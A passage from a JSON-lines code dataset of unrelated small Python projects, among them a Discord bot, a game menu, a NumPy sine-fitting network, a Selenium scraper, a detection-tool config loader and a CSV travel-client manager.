for Game Host.\\n\\nHere are the commands you can use:\",\n colour=0x00b0f4\n )\n embed.add_field(name=\"/help\", value=\"Brings up this menu.\", inline=True)\n embed.add_field(name=\"/bind\", value=\"Bind the bot to a channel.\", inline=True)\n\n await interaction.response.send_message(embed=embed)\n\n@tree.command(name=\"bind\", description=\"Sets the bot up.\")\n@app_commands.describe(channel=\"The create channel.\", category=\"The room category. If empty, will be the same category as the create channel.\")\nasync def bind(interaction, channel: discord.VoiceChannel, category: discord.CategoryChannel = None):\n server_id = interaction.guild_id\n if server_id not in server_configs:\n server_configs[server_id] = {\n 'target_channel_id': None,\n 'target_category_id': None,\n 'user_channels': {}\n }\n \n if not category:\n category = channel.category\n \n server_data = server_configs[server_id]\n server_data['target_channel_id'] = channel.id\n server_data['target_category_id'] = category.id\n \n embed = discord.Embed(\n title=\"Binded\",\n description=f\"You have now binded Game Host to {channel}.\",\n colour=0x00b0f4\n ).add_field(name=\"Discord support\", value=\"https://discord.gg/gYhaWJz8UZ\", inline=True)\n \n await interaction.response.send_message(embed=embed)\n\nclient.run(os.getenv('token'))\n","repo_name":"deezed420/gamehost","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19684700327","text":"import unittest\nfrom unittest.mock import patch\nfrom client import Client\nfrom testdata import dict1, dict2, dict3, dict4, emptydict\n\nclass TestClient(unittest.TestCase):\n \"\"\"Test cases for the Client class.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the Client object before each test.\"\"\"\n self.client = Client()\n\n @patch(\"builtins.input\", side_effect=[\"name\", \"nicholas\"])\n def test_createdict_single_dict(self, mock_input):\n \"\"\"\n Test createdict method for a single dictionary.\n\n This test case mocks the user input and tests the createdict method of\n the Client class for creating a single dictionary. It provides the mock\n input 'name' and 'nicholas' and checks if the returned dictionary matches\n the expected dictionary.\n \"\"\"\n num_members = 1\n num_keys = 1\n expected_dict = [{'name': 'nicholas'}]\n result = self.client.createdict(num_members, num_keys)\n self.assertEqual(result, expected_dict)\n\n @patch(\"builtins.input\", side_effect=[\"hobby\", \"Surfing\", \"number\", \"10\", \"group\", \"b\", \"project\", \"server\"])\n def test_createdict_multiple_dicts(self, mock_input):\n \"\"\"\n Test createdict method for multiple dictionaries.\n\n This test case mocks the user input and tests the createdict method of\n the Client class for creating multiple dictionaries. It provides the mock\n input 'hobby', 'Surfing', 'number', '10', 'group', 'b', 'project', and\n 'server', and checks if the returned list of dictionaries matches the\n expected list of dictionaries.\n \"\"\"\n num_members = 2\n num_keys = 2 # Provide enough keys and values for two dictionaries with three pairs each\n expected_dict = [\n {'hobby': 'Surfing', 'number': '10'},\n {'group': 'b', 'project': 'server'}\n ]\n result = self.client.createdict(num_members, num_keys)\n self.assertEqual(result, expected_dict)\n\n def tearDown(self):\n \"\"\"Clean up after each test by closing the client socket.\"\"\"\n self.client.client.close()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"YoHomeE/End-Of-Module-Assignment","sub_path":"Tests/utest4.py","file_name":"utest4.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12336230812","text":"import os\nfrom .game_platform import Game, CommandLine, Piece\nfrom .game_platform.ai_player import AI_Player\nfrom .communication_platform.communicator import Communicator\nfrom .utils import *\n\nimport colorama\nimport sys\n\nclass Menu:\n def __init__(self):\n colorama.init(True)\n\n def menu(self):\n \"\"\"Prints out the menu and gets the user's input.\n If the input is 1, it will create and start the game. It will check after every turn if any player has won. If a player has won, it will print who won and the menu again.\n If the input is 2, it will describe how to play the game.\n If the input is 3, it will quit the program.\n\n Keyword arguments:\n return -- Prints out the menu which the user can choose from.\n \"\"\"\n clear_screen()\n while True:\n print('### UU-GAME ###')\n print(\"### You can at all times quit the game by inputting [Q] ###\")\n print('1. Play Local')\n print('2. Play Online')\n print('3. How to play')\n print('4. Quit')\n\n user_input = input('Please enter your choice from the menu and press enter: ')\n if user_input == '1':\n clear_screen()\n print('### LOCAL-GAME ###')\n print('1. Player 1 vs Player 2')\n print('2. Player 1 vs Computer')\n user_input_again = input('Please enter your choice from the menu and press enter: ')\n if user_input_again == '1':\n game = Game()\n cmd = CommandLine(game)\n while (True):\n\n cmd.print_board()\n self.info()\n cmd.play()\n\n if (cmd.game.check_if_piece_won_game(Piece.Black)):\n cmd.print_board()\n print(\"Black has won the game\")\n break\n if (cmd.game.check_if_piece_won_game(Piece.White)):\n cmd.print_board()\n print(\"White has won the game\")\n break\n elif user_input_again == '2':\n game = Game()\n cmd = CommandLine(game)\n self.ai = AI_Player(game)\n # Makes sure that its a new game_file every new game against the AI.\n print('This is where we play against the AI')\n difficulty = \"-1\"\n while difficulty not in [\"0\", \"1\", \"2\"]:\n difficulty = input(\"Choose difficulty level (Easy - 0, Medium - 1, Hard - 2): \")\n \n # Calls on the funciton that mainly manage the game against the AI.\n self.play_against_AI(cmd, difficulty)\n\n menu_input = input('<- Back to main menu, input 3 and press enter: ')\n if menu_input == '3':\n clear_screen()\n elif user_input == '2':\n clear_screen()\n communicator = Communicator()\n communicator.start()\n elif user_input == '3':\n clear_screen()\n game = Game()\n cmd = CommandLine(game)\n cmd.print_board()\n howto_text = f\"\"\"\nThis is preview of the board.\nBlack players pieces are denoted by {colorama.Fore.MAGENTA}B{colorama.Style.RESET_ALL} and white players pieces are denoted by {colorama.Style.BRIGHT}W{colorama.Style.RESET_ALL}.\nThe pieces you have not placed yet are represented below the board.\n\n* Both players in the game will have twelve pieces each and have twenty four places to place on the board.\n* The player who starts first will always be black.\n* The board starts empty and each player will have to place their pieces on the board taking turns.\n* You can take your opponents piece out of the board if you have a three in a row.\n* Three in a row can be done horizontally, vertically or even diagonally.\n* Once all the pieces are placed on the board, each player can move their pieces to adjacent empty places along the lines.\n* When a player has three pieces left on the board, the player can move their pieces to any empty place on the board.\n\nA player will win the game if you satisfy any of these two conditions\n1. When their opponent’s pieces are reduced to less than three.\n2. If you can surround your opponent’s pieces making them unable to move or match three in a row.\n\nThe game will end in a draw when the total amount of turns reaches 200.\n\"\"\"\n print(howto_text)\n menu_input = input('<- Back to main menu, input 1 and press enter: ')\n if menu_input == '1':\n clear_screen()\n\n elif user_input == '4':\n self.quit_in_main_menu()\n\n def quit(self):\n \"\"\"\"\n Gives the user 3 options when quit() is being called in terminal by input [q] or [Q]. The user can quit the\n session by heading back to main menu with inout [M] or [m], quit the complete game in terminal with input\n [q] or [Q] or cancel and head back to the session the user was on before calling for quit by cancelling with\n input [c] or [C].\n\n Keyword arguments:\n \"\"\"\n alternatives = [\"M\", \"m\", \"Q\", \"q\", \"C\", \"c\"]\n while True:\n user_input = input(\"To quit the game insert [Q], to get back to main menu [M] or cancel [C]: \")\n if user_input in alternatives:\n break\n\n if user_input == 'M' or user_input == 'm':\n clear_screen()\n self.menu()\n\n elif user_input == 'Q' or user_input == 'q':\n clear_screen()\n sys.exit('You have quited the UU-Game')\n\n elif user_input == 'C' or user_input == 'c':\n return\n\n def quit_in_main_menu(self):\n \"\"\"\"\n Gives the user 2 options when they want to quit the game from the main menu. Quit the complete game in terminal\n with input [q] or [Q] or cancel and head back to the main menu with input [c] or [C].\n\n Keyword arguments:\n \"\"\"\n alternatives = [\"Q\", \"q\", \"C\", \"c\"]\n while True:\n user_input = input(\"To quit the game insert [Q] or cancel [C]: \")\n if user_input in alternatives:\n break\n\n if user_input == 'Q' or user_input == 'q':\n clear_screen()\n sys.exit('You have quited the UU-Game')\n\n elif user_input == 'C' or user_input == 'c':\n clear_screen()\n self.menu()\n\n def info(self):\n \"\"\"\"\n Static print information under the game board to inform the user how to quit the game.\n \"\"\"\n padding = 25\n reset_code = colorama.Style.RESET_ALL + colorama.Style.DIM\n print(\" \"*padding + colorama.Fore.YELLOW + \"To quit input [Q]\" + reset_code)\n\n def play_against_AI(self, cmd, difficulty):\n \"\"\" This function takes in the chosen difficulty level (string) of the\n AI and plays against the AI. It lets both the AI and the Player play\n and translates the moves and updates both the boards between the\n turns. This is the function to call than manage the overall game\n against the AI.\n \"\"\"\n # Delete save_file\n # Create save_file\n # While loop that checks how long we play\n # Player as Input -> Translate Input -> Save in save_file\n # AI plays -> Read save_file -> Translate output -> Send it in as Player 2\n # If phase 1 call moves_to and check if eliminate\n # If phase 2 call ai_moves_from\n\n while (True):\n cmd.print_board()\n if (cmd.game.turn == Piece.Black):\n cmd.play()\n else:\n self.ai.the_ai_turn(difficulty)\n result = cmd.game.get_game_winner()\n\n if (result == Game.WinnerResults.BlackWon):\n cmd.print_board()\n print(\"Black has won the game\")\n break\n if (result == Game.WinnerResults.WhiteWon):\n cmd.print_board()\n print(\"White has won the game\")\n break\n if (result == Game.WinnerResults.Tie):\n cmd.print_board()\n print(\"It's a draw! Max amount of turns is 200\")\n break\n\n","repo_name":"Nusrat-16/Software-engineering-and-project-management","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":8466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18252124680","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# —準備輸入與正解—\r\ninput_data = np.arange(0, np.pi*2, 0.1) # 輸入\r\ncorrect_data = np.sin(input_data) # 正確答案\r\ninput_data = (input_data-np.pi)/np.pi # 輸入為 -1.0~1.0 的範圍內\r\nn_data = len(correct_data) # 資料的數量\r\n\r\n# —各設定值—\r\nn_in = 1 # 輸入層的神經元數量\r\nn_mid = 3 # 中間層的神經元數量\r\nn_out = 1 # 輸出層的神經元數量\r\n\r\nwb_width = 0.01 # 權重與偏值的範圍\r\neta = 0.1 # 學習率\r\nepoch = 1001\r\ninterval = 100 # 顯示進度的間隔\r\n\r\n# -- 中間層 --\r\nclass MiddleLayer:\r\n def __init__(self, n_upper, n): # 初期設定\r\n self.w1 = wb_width * np.random.randn(n_upper, n) # 權重(矩陣)\r\n self.b1 = wb_width * np.random.randn(n) # 偏值(向量)\r\n\r\n def forward(self, x): # 前向傳播\r\n self.x = x\r\n u1 = np.dot(x, self.w1) + self.b1\r\n self.y1 = 1/(1+np.exp(-u1)) # sigmoid 函數\r\n \r\n def backward(self, grad_y1): # 反向傳播\r\n delta1 = grad_y1 * (1-self.y1)*self.y1 # sigmoid 函數的微分\r\n \r\n self.grad_w1= np.dot(self.x.T, delta1)\r\n self.grad_b1 = np.sum(delta1, axis=0)\r\n \r\n def update(self, eta): # 更新權重與偏值\r\n self.w1 -= eta * self.grad_w1\r\n self.b1 -= eta * self.grad_b1\r\n\r\n# -- 輸出層 --\r\nclass OutputLayer:\r\n def __init__(self, n_upper, n): # 初期設定\r\n self.w2 = wb_width * np.random.randn(n_upper, n) #權重(矩陣)\r\n self.b2 = wb_width * np.random.randn(n) # 偏值(向量)\r\n \r\n def forward(self, y1): # 前向傳播\r\n self.y1 = y1\r\n u2 = np.dot(y1, self.w2) + self.b2\r\n self.y2 = u2 # 恆等函數\r\n \r\n def backward(self, t): # 反向傳播\r\n delta2 = self.y2 - t\r\n \r\n self.grad_w2 = np.dot(self.y1.T, delta2)\r\n self.grad_b2 = np.sum(delta2, axis=0)\r\n \r\n self.grad_y1 = np.dot(delta2, self.w2.T) \r\n\r\n def update(self, eta): # 更新權重與偏值\r\n self.w2 -= eta * self.grad_w2\r\n self.b2 -= eta * self.grad_b2\r\n\r\n\r\n# -- 各層的初始化 --\r\nmiddle_layer = MiddleLayer(n_in, n_mid)\r\noutput_layer = OutputLayer(n_mid, n_out)\r\n\r\n\r\n\r\n# -- 學習 --\r\nfor i in range(epoch):\r\n\r\n # 索引洗牌\r\n index_random = np.arange(n_data)\r\n np.random.shuffle(index_random)\r\n \r\n # 顯示結果用\r\n total_error = 0\r\n plot_x = []\r\n plot_y2 = []\r\n \r\n for idx in index_random:\r\n \r\n x = input_data[idx:idx+1] # 輸入\r\n t = correct_data[idx:idx+1] # 正確答案\r\n \r\n # 前向傳播\r\n middle_layer.forward(x.reshape(1, 1)) # 把輸入轉換成陣列\r\n output_layer.forward(middle_layer.y1) \r\n\r\n # 反向傳播\r\n output_layer.backward(t.reshape(1, 1)) # 反向傳播\r\n middle_layer.backward(output_layer.grad_y1)\r\n \r\n # 更新權重與偏值\r\n middle_layer.update(eta)\r\n output_layer.update(eta)\r\n \r\n if i%interval == 0:\r\n \r\n y2 = output_layer.y2.reshape(-1) # 將矩陣恢復成向量\r\n\r\n # 誤差計算\r\n total_error += 1.0/2.0*np.sum(np.square(y2 - t)) # 計算均方誤差\r\n \r\n # 輸出的記錄\r\n plot_x.append(x)\r\n plot_y2.append(y2)\r\n \r\n if i%interval == 0:\r\n \r\n # 顯示輸出的圖表\r\n \r\n\r\n plt.plot(input_data, correct_data, linestyle=\"dashed\")\r\n plt.scatter(plot_x, plot_y2, marker=\"+\")\r\n plt.show()\r\n \r\n # 顯示epoch 次數與誤差\r\n print(\"Epoch:\" + str(i) + \"/\" + str(epoch), \"Error:\" + str(total_error/n_data))","repo_name":"7-RED/Numpy","sub_path":"SineLearning/sine.py","file_name":"sine.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"421750122","text":"import time\nfrom selenium import webdriver\n\nclass Spider(object):\n def __init__(self):\n self.url = 'https://www.douyu.com/directory/all'\n self.driver = webdriver.Chrome()\n\n\n def parse_data(self):\n # 获取所有的房间节点列表\n room_list = self.driver.find_elements_by_xpath('//*[@id=\"live-new-show-content-box\"]/li/a')\n\n data_list = []\n\n for room in room_list:\n temp = {}\n temp['title'] = room.find_element_by_xpath('./div/div/h3').text\n temp['type'] = room.find_element_by_xpath('./div/div/span').text\n temp['owner'] = room.find_element_by_xpath('./div/p/span[1]').text\n # temp['num'] = room.find_element_by_xpath('./div/p/span[2]').text\n # 从selenium定位到的元素中取值: get_attribute()\n temp['cover'] = room.find_element_by_xpath('./span/img').get_attribute('src')\n print(temp)\n data_list.append(temp)\n return data_list\n\n def save_data(self,data_list):\n pass\n\n def __del__(self):\n self.driver.close()\n\n def run(self):\n # url\n while True:\n # 发送请求\n self.driver.get(self.url)\n data_list = self.parse_data()\n self.save_data(data_list)\n # 翻页\n try:\n el_next = self.driver.find_element_by_xpath('//a[@class=\"shark-pager-next\"]')\n el_next.click()\n time.sleep(3)\n except:\n break\n\nif __name__ == '__main__':\n spider = Spider()\n spider.run()","repo_name":"ioscarry/JXWY_PLUS","sub_path":"douyu/douyu.py","file_name":"douyu.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15850500604","text":"import random\ndef GerarSenha(cores,quantCores):\n senha_certa = []\n for n in range (quantCores):\n corAleatoria = random.choice(cores)\n while corAleatoria in senha_certa:\n corAleatoria = random.choice(cores)\n senha_certa.append(corAleatoria)\n return senha_certa\n\ndef ValidarPalpite (cores,palpiteJogador):\n if palpiteJogador not in cores:\n return False\n else:\n return True\n\ndef TestarVitoria(senha,palpite):\n if senha == palpite:\n return True\n else:\n return False\n\ndef TestarAcertosTotais (senha,palpite):\n AcertosTotais = 0\n for n in range (len(senha)):\n if senha[n] == palpite[n]:\n AcertosTotais += 1\n return AcertosTotais\n \n","repo_name":"CarolShiny/Jogo-Senha","sub_path":"bibSenhaCarolRodolpho.py","file_name":"bibSenhaCarolRodolpho.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24694335744","text":"import sys\n\nn = sys.argv[1:]\nn = int(n[0].strip())\nif n == 0:\n print(0)\nelse:\n i = n\n total = 1\n while i > 0:\n total *= i\n i -= 1\n s = str(total)\n total = 0\n for n in s:\n total += int(n)\n print(total)","repo_name":"type0-1/Project-Euler","sub_path":"euler-20-factorial-digit-sum.py","file_name":"euler-20-factorial-digit-sum.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35112546887","text":"import os\nimport sys\nimport yaml\nimport keyword\nimport argparse\nimport reprlib\n\nfrom typing import List, Dict, Any, MutableMapping, MutableSequence, Callable, Optional\n\n__all__ = [\"Config\", \"get_config\"]\n\n\nVALID_CHIPS : List[str] = [\"5801\", \"SIT501\"]\nVALID_DET_TYPE : List[str] = [\"camara\", \"image\", \"video\"]\nVALID_IMG_EXT : List[str] = [\".jpg\", \".jpeg\", \".png\"]\nVALID_VID_EXT : List[str] = [\".mp4\", \".avi\"]\n\n\ndef _assert_with_msg_or_exit(assertion: bool, msg: str):\n if not assertion:\n print(msg)\n sys.exit(-1)\n\n\ndef _check_path_is_valid_type_of(valid_exts: List[str], path: str):\n _, ext = os.path.splitext(path)\n return ext in valid_exts\n\n\ndef _get_files(directory: str, pred: Optional[Callable[[str], bool]] = None, recursive: Optional[bool] = True):\n paths = []\n if recursive:\n for root, _, files in os.walk(directory):\n for file in files:\n if pred is not None and callable(pred) and not pred(file):\n continue\n paths.append(os.path.join(root, file))\n else:\n for file in os.listdir(directory):\n if pred is not None and callable(pred) and not pred(file):\n continue\n paths.append(os.path.join(directory, file))\n return paths\n\n\ndef _check_keys_are_all_valid(d: Dict):\n for k, v in d.items():\n if keyword.iskeyword(k):\n print(f\"[ERROR] Python preserved key: {k}!\")\n sys.exit(-1)\n if isinstance(k, str) and not k.isidentifier():\n print(f\"[ERROR] Invalid python identifier: {k}!\")\n sys.exit(-1)\n if isinstance(v, Dict):\n _check_keys_are_all_valid(v)\n\n\ndef _parse_yaml(file: str):\n \"\"\"Load configuration from yaml file.\"\"\"\n if not os.path.exists(file):\n raise FileNotFoundError(f\"Config yaml file does not exist: {file}\")\n assert file.endswith(\".yaml\"), f\"Not a yaml file: {file}\"\n try:\n with open(file, 'r') as f:\n _c = yaml.safe_load(f)\n except Exception as e:\n print(f\"[ERROR] {e}\")\n sys.exit(-1)\n return Config(_c)\n\n\nclass Config(object):\n \"\"\"Config class to parse yaml files.\"\"\"\n _instance = False\n\n def __new__(cls, arg: Any):\n if isinstance(arg, MutableMapping):\n return super().__new__(cls)\n elif isinstance(arg, MutableSequence):\n return [cls(item) for item in arg]\n else:\n return arg\n\n def __init__(self, mapping: MutableMapping[str, Any]):\n _check_keys_are_all_valid(mapping)\n self._c = mapping\n self._instance = True\n\n def __getattr__(self, key: str):\n if not self._instance:\n return super().__getattribute__(key)\n if hasattr(self._c, key):\n return getattr(self._c, key)\n else:\n _assert_with_msg_or_exit(key in self._c, f\"[ERROR] `{key}` not in cfg, current keys: {list(self._c.keys())}\")\n return self.__class__(self._c[key])\n\n def __setattr__(self, key: str, value: Any):\n if not self._instance:\n return super().__setattr__(key, value)\n if hasattr(self._c, key):\n print(f\"[ERROR] Invalid key: {key}\")\n sys.exit(-1)\n else:\n self._c[key] = value\n\n def __repr__(self, depth: Optional[int] = 0):\n s = \"====== Configurations ======\\n\" if not depth else \"\"\n for k, v in self._c.items():\n s += \" \" * depth\n if isinstance(v, MutableMapping):\n s += f\"{k}:\\n{self.__class__(v).__repr__(depth + 1)}\"\n else:\n s += f\"{k}: {reprlib.repr(v)}\\n\"\n s += \"===========================\\n\" if not depth else \"\"\n return s\n\n\ndef get_config():\n _C = _parse_yaml(r\"GNetDet.yaml\")\n _assert_with_msg_or_exit(\n _C.CHIP in VALID_CHIPS, f\"[ERROR] Wrong Chip: `{_C.CHIP}`! Only these chips are supported: {VALID_CHIPS}\"\n )\n\n parser = argparse.ArgumentParser(description=f\"Run Object Detection on {_C.CHIP} using {_C.MODEL.NAME}.\")\n parser.add_argument(\"type\",\n type=str,\n help=\"Type of detection (eg. `camara`, `image` or `video`).\")\n parser.add_argument(\"-m\",\n \"--model\",\n type=str,\n default=\"./out.model\",\n help=\"Model path of *.model. Default is `./out.model`\")\n parser.add_argument(\"-i\",\n \"--input\",\n type=str,\n default=\"\", # Leave empty here to force that users must specify this arg explicitly.\n help=\"Path of input. REQUIRED if `type == image` or `type == video`. The input path could \"\n \"be a specific image/video file path that are going to be detected, or a valid directory \"\n \"path containing image(s)/video(s) to be detected.\")\n parser.add_argument(\"-o\",\n \"--output\",\n type=str,\n default=\"\",\n help=\"Optional, path of output. If `type == image` or `type == video`. the output path could \"\n \"be a specific image/video file path to save detection results, or a valid directory \"\n \"path in which all detected results with the same name as input files are to save. \"\n \"If `output` is not given, then the detection results will just show up immediately.\")\n parser.add_argument(\"--input-size\",\n type=int,\n default=_C.MODEL.INPUT.SIZE,\n help=\"Size of input image, must be either 448 or 224. If given, this value will override \"\n \"MODEL.INPUT.SIZE in yaml file.\")\n parser.add_argument(\"--input-format\",\n type=int,\n default=_C.MODEL.INPUT.FORMAT,\n help=\"Input image format, must be either 0 (for `BGR`) or 1 (for `YUV`). If given, this value \"\n \"will override MODEL.INPUT.FORMAT in yaml file.\")\n parser.add_argument(\"--conf-thresh\",\n type=float,\n default=_C.OPTS.CONF_THRESH,\n help=\"Threshold of confidence. A valid detection is that the output confidence is larger \"\n \"than `conf_thresh`. If given, this value will override OPTS.CONF_THRESH in yaml file.\")\n parser.add_argument(\"--prob-thresh\",\n type=float,\n default=_C.OPTS.PROB_THRESH,\n help=\"Threshold of probability. The probability (final confidence) of a output object is \"\n \"its confidence times the maximum confidence among all objects in a single image. \"\n \"Thus a valid detection is that the output probability is larger then `prob_thresh`. \"\n \"If given, this value will override OPTS.PROB_THRESH in yaml file.\")\n parser.add_argument(\"--nms-thresh\",\n type=float,\n default=_C.OPTS.NMS_THRESH,\n help=\"IOU threshold in NMS. A valid detection is that the bounding box parameterized by \"\n \"(xmin, xmax, ymin, ymax) coordinates has less iou value than nms_thresh. If given, \"\n \"this value will override OPTS.NMS_THRESH in yaml file.\")\n parser.add_argument(\"-f\",\n \"--fancy\",\n action=\"store_true\",\n default=False,\n help=\"If present, drawing fancier bounding boxes.\")\n\n args = parser.parse_args()\n\n # Check detection type\n _assert_with_msg_or_exit(\n args.type in VALID_DET_TYPE, f\"[ERROR] Invalid type: {args.type}! Must be one of {VALID_DET_TYPE}.\"\n )\n\n # Check model\n _assert_with_msg_or_exit(\n os.path.exists(args.model), f\"[ERROR] Model does not exist: {args.model}\"\n )\n\n # Check paths\n if args.type != \"camara\":\n\n # Check input path\n _assert_with_msg_or_exit(\n os.path.exists(args.input), f\"[ERROR] Input source does not exist: {args.input}\"\n )\n\n # Input path must be file or directory\n if os.path.isfile(args.input):\n is_image = _check_path_is_valid_type_of(VALID_IMG_EXT, args.input)\n is_video = _check_path_is_valid_type_of(VALID_VID_EXT, args.input)\n _assert_with_msg_or_exit(\n (is_image and args.type == \"image\") or (is_video and args.type == \"video\"),\n f\"[ERROR] Current type: `{args.type}` mismatch with input file: `{args.input}`\"\n )\n input_paths = [args.input]\n else:\n _assert_with_msg_or_exit(\n os.path.isdir(args.input), f\"[ERROR] Input directory path does not exists: {args.input}\"\n )\n\n if args.type == \"image\":\n input_paths = _get_files(args.input, lambda p: _check_path_is_valid_type_of(VALID_IMG_EXT, p), recursive=False)\n else:\n input_paths = _get_files(args.input, lambda p: _check_path_is_valid_type_of(VALID_VID_EXT, p), recursive=False)\n _assert_with_msg_or_exit(\n bool(input_paths), f\"[ERROR] No {args.type} under directory: {args.input}\"\n )\n\n _assert_with_msg_or_exit(\n all(map(lambda p: ',' not in p, input_paths)),\n f\"Path contain `,` which is not allowed in input path.\"\n )\n args.input = ','.join(input_paths)\n\n # Check output path\n if args.output:\n # output is file path\n if os.path.splitext(args.output)[1]:\n is_image = _check_path_is_valid_type_of(VALID_IMG_EXT, args.output)\n is_video = _check_path_is_valid_type_of(VALID_VID_EXT, args.output)\n _assert_with_msg_or_exit(\n (is_image and args.type == \"image\") or (is_video and args.type == \"video\"),\n f\"[ERROR] Current type: `{args.type}` mismatch with output file: `{args.output}`\"\n )\n output_paths = [args.output]\n\n # output is directory path\n else:\n os.makedirs(args.output, exist_ok=True)\n output_paths = []\n for path in input_paths:\n output_paths.append(os.path.join(args.output, f\"out_{os.path.basename(path)}\"))\n\n _assert_with_msg_or_exit(\n all(map(lambda p: ',' not in p, output_paths)),\n f\"[ERROR] Path contain `,` which is not allowed in output path.\"\n )\n args.output = ','.join(output_paths)\n\n # class_names match with num_classes\n _assert_with_msg_or_exit(\n len(_C.DATA.CLASS_NAMES) == _C.DATA.NUM_CLASSES,\n f\"[ERROR] len(class_names) != num_classes, Check yaml file.\"\n )\n\n # Search LIBGITSDK\n libgtisdk = \"\"\n try:\n for path in [\".\", *filter(lambda p: bool(p), os.environ.get(\"LD_LIBRARY_PATH\", \"\").split(':'))]:\n lib = _get_files(path, lambda p: os.path.basename(p) == \"libGTILibrary.so\")\n if lib:\n libgtisdk = os.path.abspath(lib[0])\n break\n except Exception as e:\n print(f\"[WARNING] Some errors occur when loading files from : {path}\")\n print(f\"[WARNING] {e}\")\n finally:\n _assert_with_msg_or_exit(bool(libgtisdk), f\"[ERROR] `libGTILibrary.so` does not found!\")\n\n # Set new configurations\n _C.LIBGTISDK = libgtisdk\n _C.TYPE = args.type\n _C.INPUT_PATH = args.input\n _C.OUTPUT_PATH = args.output\n _C.FANCY = args.fancy\n\n # Override Config with args\n _C.MODEL.PATH = args.model\n _C.MODEL.INPUT.SIZE = args.input_size\n _C.MODEL.INPUT.FORMAT = args.input_format\n _C.OPTS.CONF_THRESH = args.conf_thresh\n _C.OPTS.PROB_THRESH = args.prob_thresh\n _C.OPTS.NMS_THRESH = args.nms_thresh\n _C.OPTS.COLOR = [[0, 0, 0], [0, 225, 225], [225, 0, 0], [0, 225, 0], [0, 0, 225],\n [225, 0, 225], [225, 225, 225], [64, 0, 0], [192, 0, 0],\n [64, 128, 0], [192, 128, 0], [64, 0, 128], [192, 0, 128], [64, 128, 128],\n [192, 128, 128], [0, 64, 0], [128, 64, 0], [0, 192, 0], [128, 192, 0], [0, 64, 128]]\n return _C\n","repo_name":"cvamateur/pyGNetDet","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":12468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71040751827","text":"import csv\n\nclient_fields = ['mobile', 'name', 'age', 'emailid', 'loc']\nclient_database = 'travel.csv'\n\n\ndef displaymenu():\n print(\"Welcome to Travel Management System\\n\")\n print(\"1. Add Client\\n\")\n print(\"2. View Client\\n\")\n print(\"3. Update Client\\n\")\n print(\"4. Delete Client\\n\")\n print(\"5. Exit\\n\")\n\n\ndef add_student():\n print(\"Add Client Menu\")\n global client_fields\n global client_database\n\n client_data = []\n for field in client_fields:\n value = input(\"Enter \" + field + \":\")\n client_data.append(value)\n\n with open(client_database, \"a\", encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerows([client_data])\n\n print(\"Data added successfully !\")\n input(\"Press enter to continue\")\n return\n\n\ndef view_student():\n print(\"View Client Menu\")\n global client_fields\n global client_database\n\n print(\"List of Clients :\")\n\n with open(client_database, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n for i in client_fields:\n print(i, end='\\t |')\n print(\"\\n\")\n\n for row in reader:\n for item in row:\n print(item, end=\"\\t |\")\n print(\"\\n\")\n\n input(\"Press enter to continue\")\n\n\ndef update_student():\n print(\"Update Client Menu\")\n global client_fields\n global client_database\n\n mob = input(\"Enter client's mobile number to update:\")\n index_client = None\n update_data = []\n\n with open(client_database, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n counter = 0\n for row in reader:\n if len(row) > 0:\n if mob == row[0]:\n client_student = counter\n print(f\"Client's Number Found at Index value {client_student}\")\n client_data = []\n for field in client_fields:\n value = input(\"Enter \" + field + \":\")\n client_data.append(value)\n update_data.append(client_data)\n else:\n update_data.append(row)\n counter += 1\n\n if index_client is not None:\n with open(client_database, \"w\", encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerows([update_data])\n\n else:\n print(\"No client entries found for that Number\")\n\n input(\"Enter any key to continue\")\n\n\ndef delete_student():\n print(\"Delete Client Menu\")\n global client_fields\n global client_database\n\n roll_number = input(\"Please enter client number:\")\n client_found = False\n update_data = []\n with open(client_database, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n counter = 0\n for row in reader:\n if len(row) > 0:\n if roll_number != row[0]:\n update_data.append(row)\n counter += 1\n else:\n client_found = True\n\n if client_found is True:\n with open(client_database, \"w\", encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerows(update_data)\n print(f\"Client was deleted successfully!\")\n\n else:\n print(\"Client Number not found in database\")\n\n input(\"Press enter to continue\")\n\n\nwhile True:\n displaymenu()\n choice = int(input(\"Enter your choice:\"))\n if choice == 1:\n add_student()\n elif choice == 2:\n view_student()\n elif choice == 3:\n update_student()\n elif choice == 4:\n delete_student()\n elif choice >= 5:\n print(\"Thanks for using Travel Management System\")\n exit()\n else:\n print(\"Wrong Choice!\")\n","repo_name":"cmulay/python-aio","sub_path":"CLI/Travel Management System/travel.py","file_name":"travel.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"71704288147","text":"\"\"\"Script to seed database.\"\"\"\n\nimport os\nimport json\nfrom datetime import datetime\n\nimport model\nimport server\n\nos.system(\"dropdb melonrez\")\nos.system(\"createdb melonrez\")\n\nmodel.connect_to_db(server.app)\nmodel.db.create_all()\n\n\ndef load_users():\n \"\"\" Load users into the database. \"\"\"\n\n kailey = model.User.create_user(user_id=1, email='kk@gmail.com')\n 